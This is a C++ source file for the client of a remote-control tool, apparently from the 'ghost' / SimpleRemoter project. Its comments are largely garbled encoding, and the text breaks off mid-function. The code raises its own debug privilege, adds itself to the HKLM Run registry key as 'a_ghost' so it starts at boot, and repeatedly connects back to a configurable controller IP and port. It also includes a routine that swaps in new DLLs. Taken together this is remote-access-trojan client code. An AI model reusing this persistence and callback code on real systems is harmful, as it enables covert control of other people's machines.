2019-01-05 20:21:43 +08:00
|
|
|
|
// ClientDll.cpp : Defines the entry point for the DLL application.
|
|
|
|
|
|
//
|
|
|
|
|
|
|
|
|
|
|
|
#include "stdafx.h"
|
|
|
|
|
|
#include "Common.h"
|
|
|
|
|
|
#include "IOCPClient.h"
|
|
|
|
|
|
#include <IOSTREAM>
|
|
|
|
|
|
#include "LoginServer.h"
|
|
|
|
|
|
#include "KernelManager.h"
|
2024-12-29 20:47:14 +08:00
|
|
|
|
#include <iosfwd>
|
|
|
|
|
|
#include <vector>
|
|
|
|
|
|
#include <iostream>
|
|
|
|
|
|
#include <fstream>
|
|
|
|
|
|
#include <sstream>
|
|
|
|
|
|
#include <shellapi.h>
|
|
|
|
|
|
#include <corecrt_io.h>
|
2019-01-05 20:21:43 +08:00
|
|
|
|
|
2024-12-28 18:35:34 +08:00
|
|
|
|
// <20>Զ<EFBFBD><D4B6><EFBFBD><EFBFBD><EFBFBD>ע<EFBFBD><D7A2><EFBFBD><EFBFBD><EFBFBD>е<EFBFBD>ֵ
|
|
|
|
|
|
#define REG_NAME "a_ghost"
|
|
|
|
|
|
|
2025-04-07 18:18:36 +08:00
|
|
|
|
// <20><><EFBFBD><EFBFBD><EFBFBD>Ŀͻ<C4BF><CDBB>˸<EFBFBD><CBB8><EFBFBD>
|
|
|
|
|
|
#define CLIENT_PARALLEL_NUM 1
|
|
|
|
|
|
|
|
|
|
|
|
// <20>ͻ<EFBFBD><CDBB><EFBFBD><EFBFBD>ࣺ<EFBFBD><E0A3BA>ȫ<EFBFBD>ֱ<EFBFBD><D6B1><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>һ<EFBFBD><D2BB>.
|
|
|
|
|
|
// <20><><EFBFBD>տͻ<D5BF><CDBB><EFBFBD>ֻ<EFBFBD><D6BB>2<EFBFBD><32>ȫ<EFBFBD>ֱ<EFBFBD><D6B1><EFBFBD>: g_SETTINGS<47><53>g_MyApp<70><70><EFBFBD><EFBFBD>g_SETTINGS<47><53>Ϊg_MyApp<70>ij<EFBFBD>Ա.
|
|
|
|
|
|
// <20><><EFBFBD><EFBFBD>ȫ<EFBFBD><C8AB><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ֻ<EFBFBD><D6BB>һ<EFBFBD><D2BB>ȫ<EFBFBD>ֱ<EFBFBD><D6B1><EFBFBD>: g_MyApp
|
|
|
|
|
|
typedef struct ClientApp
|
|
|
|
|
|
{
|
|
|
|
|
|
BOOL g_bExit; // Ӧ<>ó<EFBFBD><C3B3><EFBFBD>״̬<D7B4><CCAC>1-<2D><><EFBFBD>ض<EFBFBD><D8B6>˳<EFBFBD> 2-<2D><><EFBFBD>ض<EFBFBD><D8B6>˳<EFBFBD> 3-<2D><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
BOOL g_bThreadExit; // <20><><EFBFBD><EFBFBD><EFBFBD>߳<EFBFBD>״̬
|
|
|
|
|
|
HINSTANCE g_hInstance; // <20><><EFBFBD>̾<EFBFBD><CCBE><EFBFBD>
|
|
|
|
|
|
CONNECT_ADDRESS *g_Connection; // <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ϣ
|
|
|
|
|
|
HANDLE g_hEvent; // ȫ<><C8AB><EFBFBD>¼<EFBFBD>
|
|
|
|
|
|
}ClientApp;
|
|
|
|
|
|
|
2019-04-15 16:24:32 +08:00
|
|
|
|
// Զ<>̵<EFBFBD>ַ
|
2025-04-07 18:18:36 +08:00
|
|
|
|
CONNECT_ADDRESS g_SETTINGS = {FLAG_GHOST, "127.0.0.1", "6543", CLIENT_TYPE_DLL};
|
2019-04-15 16:24:32 +08:00
|
|
|
|
|
2025-04-07 18:18:36 +08:00
|
|
|
|
// Ӧ<>ó<EFBFBD><C3B3><EFBFBD>
|
|
|
|
|
|
ClientApp g_MyApp = { FALSE, FALSE, NULL, &g_SETTINGS, NULL };
|
2019-04-15 16:24:32 +08:00
|
|
|
|
|
2025-04-07 18:18:36 +08:00
|
|
|
|
// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>̣߳<DFB3><CCA3><EFBFBD><EFBFBD><EFBFBD>Ϊ<EFBFBD><CEAA>ClientApp
|
2019-01-05 20:21:43 +08:00
|
|
|
|
DWORD WINAPI StartClient(LPVOID lParam);
|
|
|
|
|
|
|
2019-01-06 21:18:26 +08:00
|
|
|
|
#if _CONSOLE
|
|
|
|
|
|
|
|
|
|
|
|
enum { E_RUN, E_STOP } status;
|
|
|
|
|
|
|
2024-12-28 18:35:34 +08:00
|
|
|
|
//<2F><><EFBFBD><EFBFBD>Ȩ<EFBFBD><C8A8>
|
|
|
|
|
|
void DebugPrivilege()
|
|
|
|
|
|
{
|
|
|
|
|
|
HANDLE hToken = NULL;
|
|
|
|
|
|
//<2F><EFBFBD>ǰ<EFBFBD><C7B0><EFBFBD>̵ķ<CCB5><C4B7><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
int hRet = OpenProcessToken(GetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken);
|
|
|
|
|
|
|
|
|
|
|
|
if (hRet)
|
|
|
|
|
|
{
|
|
|
|
|
|
TOKEN_PRIVILEGES tp;
|
|
|
|
|
|
tp.PrivilegeCount = 1;
|
|
|
|
|
|
//ȡ<><C8A1><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ȩ<EFBFBD><EFBFBD>LUID
|
|
|
|
|
|
LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &tp.Privileges[0].Luid);
|
|
|
|
|
|
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
|
|
|
|
|
|
//<2F><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ƶ<EFBFBD>Ȩ<EFBFBD><C8A8>
|
|
|
|
|
|
AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(tp), NULL, NULL);
|
|
|
|
|
|
|
|
|
|
|
|
CloseHandle(hToken);
|
|
|
|
|
|
}
|
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
/**
|
|
|
|
|
|
* @brief <EFBFBD><EFBFBD><EFBFBD>ñ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
* @param[in] *sPath ע<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>·<EFBFBD><EFBFBD>
|
|
|
|
|
|
* @param[in] *sNmae ע<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
* @return <EFBFBD><EFBFBD><EFBFBD><EFBFBD>ע<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
* @details Win7 64λ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ϲ<EFBFBD><EFBFBD>Խ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ע<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ڣ<EFBFBD>\n
|
|
|
|
|
|
* HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run
|
|
|
|
|
|
* @note <EFBFBD>״<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ҫ<EFBFBD>Թ<EFBFBD><EFBFBD><EFBFBD>ԱȨ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>У<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ע<EFBFBD><EFBFBD><EFBFBD><EFBFBD>д<EFBFBD>뿪<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
*/
|
|
|
|
|
|
BOOL SetSelfStart(const char* sPath, const char* sNmae)
|
|
|
|
|
|
{
|
|
|
|
|
|
DebugPrivilege();
|
|
|
|
|
|
|
|
|
|
|
|
// д<><D0B4><EFBFBD><EFBFBD>ע<EFBFBD><D7A2><EFBFBD><EFBFBD>·<EFBFBD><C2B7>
|
|
|
|
|
|
#define REGEDIT_PATH "Software\\Microsoft\\Windows\\CurrentVersion\\Run\\"
|
|
|
|
|
|
|
|
|
|
|
|
// <20><>ע<EFBFBD><D7A2><EFBFBD><EFBFBD><EFBFBD><EFBFBD>д<EFBFBD><D0B4><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ϣ
|
|
|
|
|
|
HKEY hKey = NULL;
|
|
|
|
|
|
LONG lRet = RegOpenKeyExA(HKEY_LOCAL_MACHINE, REGEDIT_PATH, 0, KEY_ALL_ACCESS, &hKey);
|
|
|
|
|
|
|
|
|
|
|
|
// <20>ж<EFBFBD><D0B6>Ƿ<EFBFBD><C7B7>ɹ<EFBFBD>
|
|
|
|
|
|
if (lRet != ERROR_SUCCESS)
|
|
|
|
|
|
return FALSE;
|
|
|
|
|
|
|
|
|
|
|
|
lRet = RegSetValueExA(hKey, sNmae, 0, REG_SZ, (const BYTE*)sPath, strlen(sPath) + 1);
|
|
|
|
|
|
|
|
|
|
|
|
// <20>ر<EFBFBD>ע<EFBFBD><D7A2><EFBFBD><EFBFBD>
|
|
|
|
|
|
RegCloseKey(hKey);
|
|
|
|
|
|
|
|
|
|
|
|
// <20>ж<EFBFBD><D0B6>Ƿ<EFBFBD><C7B7>ɹ<EFBFBD>
|
|
|
|
|
|
return lRet == ERROR_SUCCESS;
|
|
|
|
|
|
}
|
|
|
|
|
|
|
2019-03-25 22:25:14 +08:00
|
|
|
|
// <20><><EFBFBD>ؿ<EFBFBD><D8BF><EFBFBD>̨
|
|
|
|
|
|
// <20>ο<EFBFBD><CEBF><EFBFBD>https://blog.csdn.net/lijia11080117/article/details/44916647
|
|
|
|
|
|
// step1: <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>"<22><EFBFBD>"<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ڵ<EFBFBD>ΪmainCRTStartup
|
|
|
|
|
|
// step2: <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>"ϵͳ"<22><><EFBFBD><EFBFBD>ϵͳΪ<CDB3><CEAA><EFBFBD><EFBFBD>
|
|
|
|
|
|
// <20><><EFBFBD><EFBFBD>
|
|
|
|
|
|
|
2019-01-06 21:18:26 +08:00
|
|
|
|
BOOL CALLBACK callback(DWORD CtrlType)
|
|
|
|
|
|
{
|
|
|
|
|
|
if (CtrlType == CTRL_CLOSE_EVENT)
|
|
|
|
|
|
{
|
2025-04-07 18:18:36 +08:00
|
|
|
|
g_MyApp.g_bExit = true;
|
2019-01-06 21:18:26 +08:00
|
|
|
|
while (E_RUN == status)
|
|
|
|
|
|
Sleep(20);
|
|
|
|
|
|
}
|
|
|
|
|
|
return TRUE;
|
|
|
|
|
|
}
|
|
|
|
|
|
|
2025-04-07 18:18:36 +08:00
|
|
|
|
// <20>߳<EFBFBD>`StartClientApp`<60><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>.
|
|
|
|
|
|
typedef struct ClientStartArg
|
|
|
|
|
|
{
|
|
|
|
|
|
int ID; // <20>̷߳<DFB3><CCB7>ش<EFBFBD><D8B4><EFBFBD>
|
|
|
|
|
|
ClientApp App; // <20>ͻ<EFBFBD><CDBB>˶<EFBFBD><CBB6><EFBFBD>
|
|
|
|
|
|
const char* IP; // Զ<><D4B6>IP
|
|
|
|
|
|
int Port; // Զ<>̶˿<CCB6>
|
|
|
|
|
|
}ClientStartArg;
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
DWORD StartClientApp(int id, ClientApp &app, const char *ip, int port) {
|
|
|
|
|
|
CONNECT_ADDRESS& settings(*(app.g_Connection));
|
|
|
|
|
|
BOOL& bExit(app.g_bExit);
|
|
|
|
|
|
if (ip != NULL && port > 0)
|
|
|
|
|
|
{
|
|
|
|
|
|
settings.SetServer(ip, port);
|
|
|
|
|
|
}
|
|
|
|
|
|
if (strlen(settings.ServerIP()) == 0 || settings.ServerPort() <= 0) {
|
|
|
|
|
|
Mprintf("<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>: <20><><EFBFBD>ṩԶ<E1B9A9><D4B6><EFBFBD><EFBFBD><EFBFBD><EFBFBD>IP<49>Ͷ˿<CDB6>!\n");
|
|
|
|
|
|
Sleep(3000);
|
|
|
|
|
|
return -1;
|
|
|
|
|
|
}
|
|
|
|
|
|
app.g_hInstance = GetModuleHandle(NULL);
|
|
|
|
|
|
Mprintf("[server: %d] %s:%d HINSTANCE: %p\n", id, settings.ServerIP(), settings.ServerPort(), app.g_hInstance);
|
|
|
|
|
|
|
|
|
|
|
|
do {
|
|
|
|
|
|
bExit = 0;
|
|
|
|
|
|
HANDLE hThread = CreateThread(NULL, 0, StartClient, &app, 0, NULL);
|
|
|
|
|
|
|
|
|
|
|
|
WaitForSingleObject(hThread, INFINITE);
|
|
|
|
|
|
CloseHandle(hThread);
|
|
|
|
|
|
} while (E_RUN == status && 1 != bExit);
|
|
|
|
|
|
|
|
|
|
|
|
return id;
|
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
DWORD WINAPI StartClientApp(LPVOID param) {
|
|
|
|
|
|
ClientStartArg* a = (ClientStartArg*)param;
|
|
|
|
|
|
auto r = StartClientApp(a->ID, a->App, a->IP, a->Port);
|
|
|
|
|
|
SAFE_DELETE(a);
|
|
|
|
|
|
return r;
|
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
/**
|
|
|
|
|
|
* @brief <EFBFBD>ȴ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>֧<EFBFBD>ֳ<EFBFBD><EFBFBD><EFBFBD>MAXIMUM_WAIT_OBJECTS<EFBFBD><EFBFBD><EFBFBD>ƣ<EFBFBD>
|
|
|
|
|
|
* @param handles <EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
* @param waitAll <EFBFBD>Ƿ<EFBFBD><EFBFBD>ȴ<EFBFBD><EFBFBD><EFBFBD><EFBFBD>о<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ɣ<EFBFBD>TRUE=ȫ<EFBFBD><EFBFBD>, FALSE=<EFBFBD><EFBFBD><EFBFBD><EFBFBD>һ<EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
* @param timeout <EFBFBD><EFBFBD>ʱʱ<EFBFBD>䣨<EFBFBD><EFBFBD><EFBFBD>룬INFINITE<EFBFBD><EFBFBD>ʾ<EFBFBD><EFBFBD><EFBFBD>ȴ<EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
* @return <EFBFBD>ȴ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>WAIT_OBJECT_0<EFBFBD>ɹ<EFBFBD>, WAIT_FAILEDʧ<EFBFBD>ܣ<EFBFBD>
|
|
|
|
|
|
*/
|
|
|
|
|
|
DWORD WaitForMultipleHandlesEx(
|
|
|
|
|
|
const std::vector<HANDLE>& handles,
|
|
|
|
|
|
BOOL waitAll = TRUE,
|
|
|
|
|
|
DWORD timeout = INFINITE
|
|
|
|
|
|
) {
|
|
|
|
|
|
const DWORD MAX_WAIT = MAXIMUM_WAIT_OBJECTS; // ϵͳ<CFB5><CDB3><EFBFBD>ƣ<EFBFBD>64<36><34>
|
|
|
|
|
|
DWORD totalHandles = static_cast<DWORD>(handles.size());
|
|
|
|
|
|
|
|
|
|
|
|
// 1. <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ч<EFBFBD><D0A7>
|
|
|
|
|
|
for (HANDLE h : handles) {
|
|
|
|
|
|
if (h == NULL || h == INVALID_HANDLE_VALUE) {
|
|
|
|
|
|
SetLastError(ERROR_INVALID_HANDLE);
|
|
|
|
|
|
return WAIT_FAILED;
|
|
|
|
|
|
}
|
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
// 2. <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>64<36><34>ֱ<EFBFBD>ӵ<EFBFBD><D3B5><EFBFBD>ԭ<EFBFBD><D4AD>API
|
|
|
|
|
|
if (totalHandles <= MAX_WAIT) {
|
|
|
|
|
|
return WaitForMultipleObjects(totalHandles, handles.data(), waitAll, timeout);
|
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
// 3. <20><><EFBFBD><EFBFBD><EFBFBD>ȴ<EFBFBD><C8B4><EFBFBD>
|
|
|
|
|
|
if (waitAll) {
|
|
|
|
|
|
// <20><><EFBFBD><EFBFBD><EFBFBD>ȴ<EFBFBD><C8B4><EFBFBD><EFBFBD>о<EFBFBD><D0BE><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
for (DWORD i = 0; i < totalHandles; i += MAX_WAIT) {
|
|
|
|
|
|
DWORD batchSize = min(MAX_WAIT, totalHandles - i);
|
|
|
|
|
|
DWORD result = WaitForMultipleObjects(
|
|
|
|
|
|
batchSize,
|
|
|
|
|
|
&handles[i],
|
|
|
|
|
|
TRUE, // <20><><EFBFBD><EFBFBD><EFBFBD>ȴ<EFBFBD><C8B4><EFBFBD>ǰ<EFBFBD><C7B0><EFBFBD><EFBFBD>ȫ<EFBFBD><C8AB><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
timeout
|
|
|
|
|
|
);
|
|
|
|
|
|
if (result == WAIT_FAILED) {
|
|
|
|
|
|
return WAIT_FAILED;
|
|
|
|
|
|
}
|
|
|
|
|
|
}
|
|
|
|
|
|
return WAIT_OBJECT_0;
|
|
|
|
|
|
}
|
|
|
|
|
|
else {
|
|
|
|
|
|
// ֻ<><D6BB><EFBFBD>ȴ<EFBFBD><C8B4><EFBFBD><EFBFBD><EFBFBD>һ<EFBFBD><D2BB><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
while (true) {
|
|
|
|
|
|
for (DWORD i = 0; i < totalHandles; i += MAX_WAIT) {
|
|
|
|
|
|
DWORD batchSize = min(MAX_WAIT, totalHandles - i);
|
|
|
|
|
|
DWORD result = WaitForMultipleObjects(
|
|
|
|
|
|
batchSize,
|
|
|
|
|
|
&handles[i],
|
|
|
|
|
|
FALSE, // <20><>ǰ<EFBFBD><C7B0><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>һ<EFBFBD><D2BB><EFBFBD><EFBFBD><EFBFBD>ɼ<EFBFBD><C9BC><EFBFBD>
|
|
|
|
|
|
timeout
|
|
|
|
|
|
);
|
|
|
|
|
|
if (result != WAIT_FAILED && result != WAIT_TIMEOUT) {
|
|
|
|
|
|
return result + i; // <20><><EFBFBD><EFBFBD>ȫ<EFBFBD><C8AB><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
}
|
|
|
|
|
|
}
|
|
|
|
|
|
if (timeout != INFINITE) {
|
|
|
|
|
|
return WAIT_TIMEOUT;
|
|
|
|
|
|
}
|
|
|
|
|
|
}
|
|
|
|
|
|
}
|
|
|
|
|
|
}
|
|
|
|
|
|
|
2019-01-06 21:18:26 +08:00
|
|
|
|
int main(int argc, const char *argv[])
|
|
|
|
|
|
{
|
2024-12-28 18:35:34 +08:00
|
|
|
|
if (!SetSelfStart(argv[0], REG_NAME))
|
2019-01-06 21:18:26 +08:00
|
|
|
|
{
|
2025-01-15 18:49:15 +08:00
|
|
|
|
Mprintf("<EFBFBD><EFBFBD><EFBFBD>ÿ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʧ<EFBFBD>ܣ<EFBFBD><EFBFBD><EFBFBD><EFBFBD>ù<EFBFBD><EFBFBD><EFBFBD>ԱȨ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>.\n");
|
2019-01-06 21:18:26 +08:00
|
|
|
|
}
|
2024-12-28 18:35:34 +08:00
|
|
|
|
|
|
|
|
|
|
status = E_RUN;
|
|
|
|
|
|
|
2019-01-07 20:46:03 +08:00
|
|
|
|
HANDLE hMutex = ::CreateMutexA(NULL, TRUE, "ghost.exe");
|
|
|
|
|
|
if (ERROR_ALREADY_EXISTS == GetLastError())
|
|
|
|
|
|
{
|
|
|
|
|
|
CloseHandle(hMutex);
|
|
|
|
|
|
return -2;
|
|
|
|
|
|
}
|
2019-01-06 21:18:26 +08:00
|
|
|
|
|
|
|
|
|
|
SetConsoleCtrlHandler(&callback, TRUE);
|
2025-04-07 18:18:36 +08:00
|
|
|
|
const char* ip = argc > 1 ? argv[1] : NULL;
|
|
|
|
|
|
int port = argc > 2 ? atoi(argv[2]) : 0;
|
|
|
|
|
|
g_MyApp.g_Connection->SetType(CLIENT_TYPE_ONE);
|
|
|
|
|
|
if (CLIENT_PARALLEL_NUM == 1) {
|
|
|
|
|
|
// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ͻ<EFBFBD><CDBB><EFBFBD>
|
|
|
|
|
|
StartClientApp(0, g_MyApp, ip, port);
|
2025-01-01 18:36:44 +08:00
|
|
|
|
} else {
|
2025-04-07 18:18:36 +08:00
|
|
|
|
std::vector<HANDLE> handles(CLIENT_PARALLEL_NUM);
|
|
|
|
|
|
for (int i = 0; i < CLIENT_PARALLEL_NUM; i++) {
|
|
|
|
|
|
handles[i] = CreateThread(0, 64*1024, StartClientApp, new ClientStartArg{ i, g_MyApp, ip, port }, 0, 0);
|
|
|
|
|
|
if (handles[i] == 0) {
|
|
|
|
|
|
Mprintf("<EFBFBD>߳<EFBFBD> %d <20><><EFBFBD><EFBFBD>ʧ<EFBFBD>ܣ<EFBFBD><DCA3><EFBFBD><EFBFBD><EFBFBD>: %d\n", i, errno);
|
|
|
|
|
|
}
|
|
|
|
|
|
}
|
|
|
|
|
|
DWORD result = WaitForMultipleHandlesEx(handles, TRUE, INFINITE);
|
|
|
|
|
|
if (result == WAIT_FAILED) {
|
|
|
|
|
|
Mprintf("WaitForMultipleObjects ʧ<>ܣ<EFBFBD><DCA3><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>: %d\n", GetLastError());
|
|
|
|
|
|
}
|
2025-01-01 18:36:44 +08:00
|
|
|
|
}
|
|
|
|
|
|
|
2019-01-06 21:18:26 +08:00
|
|
|
|
status = E_STOP;
|
|
|
|
|
|
|
2019-01-07 20:46:03 +08:00
|
|
|
|
CloseHandle(hMutex);
|
2019-01-06 21:18:26 +08:00
|
|
|
|
return 0;
|
|
|
|
|
|
}
|
|
|
|
|
|
#else
|
|
|
|
|
|
|
2019-01-05 20:21:43 +08:00
|
|
|
|
BOOL APIENTRY DllMain( HINSTANCE hInstance,
|
|
|
|
|
|
DWORD ul_reason_for_call,
|
|
|
|
|
|
LPVOID lpReserved
|
|
|
|
|
|
)
|
|
|
|
|
|
{
|
|
|
|
|
|
switch (ul_reason_for_call)
|
|
|
|
|
|
{
|
|
|
|
|
|
case DLL_PROCESS_ATTACH:
|
|
|
|
|
|
case DLL_THREAD_ATTACH:
|
|
|
|
|
|
{
|
2025-04-07 18:18:36 +08:00
|
|
|
|
g_MyApp.g_hInstance = (HINSTANCE)hInstance;
|
2019-01-05 20:21:43 +08:00
|
|
|
|
|
|
|
|
|
|
break;
|
|
|
|
|
|
}
|
|
|
|
|
|
case DLL_PROCESS_DETACH:
|
|
|
|
|
|
break;
|
|
|
|
|
|
}
|
|
|
|
|
|
return TRUE;
|
|
|
|
|
|
}
|
|
|
|
|
|
|
2019-03-25 22:25:14 +08:00
|
|
|
|
// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>һ<EFBFBD><D2BB>ghost
|
2019-01-05 20:21:43 +08:00
|
|
|
|
extern "C" __declspec(dllexport) void TestRun(char* szServerIP,int uPort)
|
|
|
|
|
|
{
|
2025-04-07 18:18:36 +08:00
|
|
|
|
ClientApp& app(g_MyApp);
|
|
|
|
|
|
CONNECT_ADDRESS& settings(*(app.g_Connection));
|
|
|
|
|
|
app.g_bExit = FALSE;
|
2024-12-29 20:47:14 +08:00
|
|
|
|
if (strlen(szServerIP)>0 && uPort>0)
|
|
|
|
|
|
{
|
2025-04-07 18:18:36 +08:00
|
|
|
|
settings.SetServer(szServerIP, uPort);
|
2024-12-29 20:47:14 +08:00
|
|
|
|
}
|
2019-01-05 20:21:43 +08:00
|
|
|
|
|
2025-04-07 18:18:36 +08:00
|
|
|
|
HANDLE hThread = CreateThread(NULL,0,StartClient, &app,0,NULL);
|
2024-12-27 01:40:40 +08:00
|
|
|
|
if (hThread == NULL) {
|
|
|
|
|
|
return;
|
|
|
|
|
|
}
|
2019-01-05 20:21:43 +08:00
|
|
|
|
#ifdef _DEBUG
|
2024-12-29 20:47:14 +08:00
|
|
|
|
WaitForSingleObject(hThread, INFINITE);
|
2019-01-05 20:21:43 +08:00
|
|
|
|
#else
|
|
|
|
|
|
WaitForSingleObject(hThread, INFINITE);
|
|
|
|
|
|
#endif
|
|
|
|
|
|
CloseHandle(hThread);
|
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
// ֹͣ<CDA3><D6B9><EFBFBD><EFBFBD>
|
2025-04-07 18:18:36 +08:00
|
|
|
|
extern "C" __declspec(dllexport) void StopRun() { g_MyApp.g_bExit = true; }
|
2019-01-05 20:21:43 +08:00
|
|
|
|
|
|
|
|
|
|
// <20>Ƿ<EFBFBD><C7B7>ɹ<EFBFBD>ֹͣ
|
2025-04-07 18:18:36 +08:00
|
|
|
|
extern "C" __declspec(dllexport) bool IsStoped() { return g_MyApp.g_bThreadExit; }
|
2019-01-05 20:21:43 +08:00
|
|
|
|
|
2019-04-15 16:24:32 +08:00
|
|
|
|
// <20>Ƿ<EFBFBD><C7B7>˳<EFBFBD><CBB3>ͻ<EFBFBD><CDBB><EFBFBD>
|
2025-04-07 18:18:36 +08:00
|
|
|
|
extern "C" __declspec(dllexport) BOOL IsExit() { return g_MyApp.g_bExit; }
|
|
|
|
|
|
|
|
|
|
|
|
// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>д˳<D0B4><CBB3><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>κβ<CEBA><CEB2><EFBFBD>
|
|
|
|
|
|
extern "C" __declspec(dllexport) int EasyRun() {
|
|
|
|
|
|
ClientApp& app(g_MyApp);
|
|
|
|
|
|
CONNECT_ADDRESS& settings(*(app.g_Connection));
|
|
|
|
|
|
|
|
|
|
|
|
do {
|
|
|
|
|
|
TestRun((char*)settings.ServerIP(), settings.ServerPort());
|
|
|
|
|
|
while (!IsStoped())
|
|
|
|
|
|
Sleep(50);
|
|
|
|
|
|
if (1 == app.g_bExit) // <20>ܿض<DCBF><D8B6>˳<EFBFBD>
|
|
|
|
|
|
break;
|
|
|
|
|
|
else if (2 == app.g_bExit)
|
|
|
|
|
|
continue;
|
|
|
|
|
|
else // 3: <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
break;
|
|
|
|
|
|
} while (true);
|
|
|
|
|
|
|
|
|
|
|
|
return app.g_bExit;
|
|
|
|
|
|
}
|
2019-04-15 16:24:32 +08:00
|
|
|
|
|
2024-12-29 20:47:14 +08:00
|
|
|
|
// copy from: SimpleRemoter\client\test.cpp
|
|
|
|
|
|
// <20><><EFBFBD><EFBFBD><EFBFBD>µ<EFBFBD>DLL
|
|
|
|
|
|
void RunNewDll(const char* cmdLine) {
|
|
|
|
|
|
char path[_MAX_PATH], * p = path;
|
|
|
|
|
|
GetModuleFileNameA(NULL, path, sizeof(path));
|
|
|
|
|
|
while (*p) ++p;
|
|
|
|
|
|
while ('\\' != *p) --p;
|
|
|
|
|
|
*(p + 1) = 0;
|
|
|
|
|
|
std::string folder = path;
|
|
|
|
|
|
std::string oldFile = folder + "ServerDll.old";
|
|
|
|
|
|
std::string newFile = folder + "ServerDll.new";
|
|
|
|
|
|
strcpy(p + 1, "ServerDll.dll");
|
|
|
|
|
|
BOOL ok = TRUE;
|
|
|
|
|
|
if (_access(newFile.c_str(), 0) != -1) {
|
|
|
|
|
|
if (_access(oldFile.c_str(), 0) != -1)
|
|
|
|
|
|
{
|
|
|
|
|
|
if (!DeleteFileA(oldFile.c_str()))
|
|
|
|
|
|
{
|
2025-01-15 18:49:15 +08:00
|
|
|
|
Mprintf("Error deleting file. Error code: %d\n", GetLastError());
|
